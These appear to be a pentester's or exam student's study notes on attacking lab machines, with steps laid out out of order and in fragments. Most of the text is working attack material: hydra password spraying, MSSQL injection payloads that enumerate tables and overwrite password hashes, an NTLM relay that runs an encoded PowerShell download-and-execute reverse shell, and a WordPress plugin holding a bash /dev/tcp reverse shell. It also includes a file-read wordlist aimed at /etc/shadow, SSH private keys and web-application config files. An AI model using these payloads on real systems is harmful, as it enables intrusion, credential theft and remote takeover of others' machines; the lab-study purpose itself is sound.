    hydra -l user -P rockyou.txt ftp://ms01
  5. FTP as user
    download: "file.zip"
    try to extract the zip file - but in this scenario, it doesn't work
  6. Run file and exiftool on "file.zip"
    Look through the metadata for names, versions etc. - we find that the name is diskboss v 8.8.x
  7. Searchsploit with the version number
  8. Remote buffer overflow
    Modify the target and add custom shellcode

Web application

  1. Host name - curl - msoscp.lab
  2. Add relevant hostnames to /etc/hosts
  3. Subdomain discovery, 403 restriction: dev.msoscp.lab
  4. FTP anonymous login
    download dev_instruction.txt
  5. Custom header required
  6. curl dev.msoscp.lab with custom header
  7. Custom header extension on browser
  8. Login page
    Authentication Bypass: SQL Injection vulnerability
  9. Usernames revealed - no file upload
  10. FTP Password Spray using user hydra -l user -P rockyou.txt ftp://ms01
    While that's running, continue looking through the webapp - look for potential entries, clues etc.
  11. Password discovered
    download zip file
    also, since winrm is an open port on the machine, try the username and password against it with evil-winrm
  12. Zip file contains a pcap and exe file
    run file and exiftool against both files
    • Run the executable in a Windows VM
    • open the pcap file using wireshark
      pcap file contains a log that displays user credentials
  13. Try the new credentials against winrm

Example Scenarios

File Upload feature on port 80
NTLMv2 Theft via ODT file

Privilege Escalation
Using MySQL to write files on the filesystem

select load_file('C:\\test\\nc.exe') into dumpfile 'C:\\test\\shell.exe';

determine time delay

'; update users set password_hash = 'tacos123' where username = 'butch';--

plain pwd

'; IF ((select count(username) from users where username = 'butch' and password_hash = '<value>')=1) WAITFOR DELAY '0:0:10';--

use burp or similar to bruteforce usernames

confirm overwrite

Using like function select: u,us,use,user,usern...

Prerequisites:

  1. SMB Signing must be disabled
  2. Situation where you can control a machine to point to your smb relay server. This could be over a webapp, command execution etc.
  3. Requires the targeted account to be able to authenticate to the targeted system using its Windows auth
    For example, it's not uncommon that the local Administrator accounts across computers in a domain are set up with the same password

In this example, we have a tunnel set up with two listeners. Listener 8080 points to a web server where we have powercat; this will be used for the download on the other end. The listener on port 443 is used by us to catch a shell. 172.16.120.243 would probably be ms01, while 172.16.120.254 would be the target, ms02, that we wish to authenticate to and execute the PowerShell on.

$var="IEX(New-Object System.Net.WebClient).DownloadString('http://172.16.120.243:8080/powercat.ps1');powercat -c 172.16.120.243 -p 443 -e powershell"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($var)
$Enc = [convert]::ToBase64String($bytes)
PS C:\Users\aslam> $Enc
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAxADYALgAxADIAMAAuADIANAAzADoAOAAwADgAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEANwAyAC4AMQA2AC4AMQAyADAALgAyADQAMwAgAC0AcAAgADQANAAzACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAA=
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.120.254 -c "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAxADYALgAxADIAMAAuADIANAAzADoAOAAwADgAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEANwAyAC4AMQA2AC4AMQAyADAALgAyADQAMwAgAC0AcAAgADQANAAzACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAA="

\\remote_ip\test

Webshell File Upload Vulnerability

  1. File upload function is detected
  2. Test which files can be uploaded
  3. Test bypasses of the files
    Extensions: php5, phar etc.
    Padding characters, null bytes etc.
    Mime-type/content-type
    Magic bytes etc.
  4. See if the uploaded files appear in the uploads path

Use weevely to create a password-protected PHP webshell, upload the file, then connect to that webshell with weevely

  1. Web application
  2. Wordpress website
  3. Wordpress plugin enumeration
  4. Unauthenticated SQL Injection vulnerability on Plugin
  5. Password hash revealed
  6. Crack the hash with john
  7. Wordpress admin panel access
  8. Wordpress admin to reverse shell via plugin upload
  9. Access as webservice user

Wordpress Admin to Reverse Shell

  • Install php plugin

Save the following code as rev_plugin.php

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.11.55.202/4444 0>&1'");
?>

Create a zip file with the php file saved inside it

zip rev.zip rev_plugin.php
  • Upload zip file as plugin in wordpress

  • Click upload plugin

Browse and select the Zip created that contains the reverse shell

Click install now to upload it

Next set up your listener and then activate the plugin (hopefully this works!)

'; update users set password_hash = '<hash>' where username = 'butch';--
echo -n 'password' | md5sum; echo -n 'password' | sha1sum; echo -n 'password' | sha256sum

only if you know all column names & have permission

brute force with the LIKE function

guessing/userlist

search for user related column names:
user, users, username, usernames, user_info etc.

exact match check. Replace <table_name> and 1

Using like function select: u,us,use,user,usern...

exact match search for pwd, pass, passwd, password, pass_hash, hash, password_hash etc.

'; IF EXISTS (SELECT 1 FROM sys.columns col JOIN sys.tables tab ON col.object_id = tab.object_id WHERE tab.name = 'users' AND col.name like 'u%') WAITFOR DELAY '0:0:10';--
sudo responder -I tun0 -v -A

\\<remote_ip>\test

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--

if you have user columns

pwds/passwords

<remote_ip>

common hash

Only change the password if the alternative methods don't work, as password reuse may exist in a pentest/CTF or similar

Relay Attacks

insert row

overwrite pwd/hash value

enumerate users

' AND 1=(SELECT CASE WHEN (SELECT COUNT(*) FROM sys.columns WHERE object_id = OBJECT_ID('users')) > 2 THEN 1 ELSE (SELECT 1/0) END)--
' AND 1=(SELECT CASE WHEN EXISTS (SELECT * FROM sys.columns WHERE object_id = OBJECT_ID('users') AND name = 'username') THEN 1 ELSE (SELECT 1/0) END)--

' AND 1=(SELECT CASE WHEN EXISTS (SELECT * FROM sys.tables WHERE name = 'users') THEN 1 ELSE (SELECT 1/0) END)--

check for column names

check if table exists

check the column count

use a condition that generates an error if the data does not meet your criteria

retrieve info from columns

ntlmrelayx

cmd

web application includes features where users can interact with external URL

url/unc input parameter

check for remote server connectivity via webapp

webapp file uploads or network paths as part of its configuration


ssrf

'; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--

scenarios example

responder

TIP: Time-based Burp Check
After running burp intruder for name enumeration on the DB (for time-based attacks):
select: Columns > Response received

https://portswigger.net/web-security/sql-injection/cheat-sheet

SQLi Authentication

' OR 1=1;--
' OR '1
' OR 1 -- -
" OR "" = "

Using like function
select: u, us, use, user etc.

custom wl

use wordlists shown above

processes

std check

ssh keys

consider unknown services Backdoor

general useful

Use: iis_log_lfi.py to generate the wordlist. Adjust the dates if needed

C:\inetpub\logs\LogFiles\W3SVC1\u_ex240830.log
C:\inetpub\logs\LogFiles\W3SVC1\u_ex240831.log
C:\inetpub\logs\LogFiles\W3SVC1\u_ex240901.log
/etc/passwd
/root/.bash_history
/home/<user>/.bash_history
/etc/hosts
/etc/shadow
id_rsa
id_dsa
id_ecdsa
id_ed25519
private_key
ssh_private_key
mykey
my_key
server_key
key
ssh_key
deploy_key
backup_id_rsa
backup_id_dsa
backup_id_ecdsa
backup_id_ed25519
temp_id_rsa
temp_id_dsa
temp_id_ecdsa
temp_id_ed25519
/var/www/html/wp-config.php
/srv/www/wordpress/wp-config.php
/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/httpd.conf
/var/log/apache2/error.log
/var/log/apache2/access.log
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/usr/local/nginx/conf/nginx.conf
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/nginx/logs/error.log
/usr/local/nginx/logs/access.log
/var/log/mysql/error.log
/var/log/auth.log
/var/log/secure
/var/log/syslog
/var/log/messages
/var/lib/jenkins/config.xml
/var/lib/jenkins/credentials.xml
/var/log/jenkins/jenkins.log
/var/www/html/configuration.php
/srv/www/joomla/configuration.php
/var/log/joomla/error.php
/var/log/apache2/joomla_error.log
/srv/www/drupal/sites/default/settings.php
/var/www/html/sites/default/settings.local.php
/var/log/drupal-watchdog.log
/var/log/apache2/drupal_error.log
/var/www/html/web.config
/umbraco/config/umbracoSettings.config
/App_Data/Logs/UmbracoTraceLog.txt
/var/www/glpi/config/config_db.php

save each wordlist to a file and then loop through

/proc/self/cmdline

lin wl

ssh key filename

config & logs

running processes

auto check: lfienum

'; IF (1=1) WAITFOR DELAY '0:0:10';--
'; IF EXISTS (SELECT 1 FROM sys.tables WHERE name LIKE 'u%') WAITFOR DELAY '0:0:10';--
'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>2) WAITFOR DELAY '0:0:10';--
'; IF ((SELECT COUNT(*) FROM sys.columns WHERE object_id = OBJECT_ID('<table_name>')) = 1) WAITFOR DELAY '0:0:10';--

users/usernames

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'pass')=1) WAITFOR DELAY '0:0:10';--
'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'pass%')=1) WAITFOR DELAY '0:0:10';--
'; IF EXISTS (SELECT 1 FROM sys.columns col JOIN sys.tables tab ON col.object_id = tab.object_id WHERE tab.name = 'users' AND col.name like 'pass%') WAITFOR DELAY '0:0:10';--
'; INSERT INTO users (user_id, username, password_hash) VALUES (3, 'test', '6b3a55e0261b0304143f805a24924d0c1c44524821305f31d9277843b8a10f4e'); WAITFOR DELAY '0:0:5';--
'; INSERT INTO users (user_id, username, password_hash) VALUES (3, 'test', '6b3a55e0261b0304143f805a24924d0c1c44524821305f31d9277843b8a10f4e');--
'; IF EXISTS (SELECT 1 FROM <users_table> WHERE <username_column> like 'bu%') WAITFOR DELAY '0:0:5';--
'; IF EXISTS (SELECT 1 FROM <users_table> WHERE <username_column> = 'admin') WAITFOR DELAY '0:0:5';--
' AND 1=(SELECT CASE WHEN EXISTS (SELECT * FROM users WHERE password_hash = 'some_value') THEN 1 ELSE (SELECT 1/0) END)-- 
' AND 1=1; UPDATE users SET password_hash = 'newpassword' WHERE username = 'targetuser'-- 
curl -s "http://url/page?param=/proc/self/cmdline" -o- | xxd
lfienum "http://$trgt1/page?param=" --pids 50000 | tee procs.txt
lfienum "http://$trgt1/page?param="
lfienum "http://$trgt1/page?param=" -k
lfienum "http://$trgt1/page?param=" -w lfi_wordlist.txt